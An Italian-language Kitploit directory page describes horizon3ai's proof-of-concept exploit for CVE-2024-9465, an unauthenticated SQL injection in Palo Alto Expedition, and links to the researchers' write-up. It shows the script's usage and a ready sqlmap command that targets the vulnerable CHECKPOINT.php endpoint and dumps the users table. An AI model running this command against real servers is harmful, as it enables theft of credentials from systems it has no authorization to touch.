Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-9465 — Exploit proof-of-concept per CVE-2024-9465 | Kitploit
Strumenti/GitHubGitHub/horizon3ai/cve-2024-9465
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubhorizon3ai/cve-2024-9465

CVE-2024-9465

Exploit proof-of-concept per CVE-2024-9465

Vedi Repository
3141 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-9465: Palo Alto Expedition SQL Injection non autenticata

Proof of concept per sfruttare CVE-2024-9465 su dispositivi vulnerabili.

Articolo del Blog

Causa principale e indicatori di compromissione qui: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/

Utilizzo

% python3 CVE-2024-9465.py -h
usage: CVE-2024-9465.py [-h] -u URL

options:
  -h, --help         show this help message and exit
  -u URL, --url URL  The URL of the target

Dump della Tabella con SQLMap

python3 sqlmap.py -u "https://<ip_address>/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=im port&type=test&project=pandbRBAC&signatureid=1" -p signatureid -T users --dump

Segui l'Horizon3.ai Attack Team su Twitter per le ultime ricerche sulla sicurezza:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Disclaimer

Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzati. I manutentori del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.

Scarica lo strumento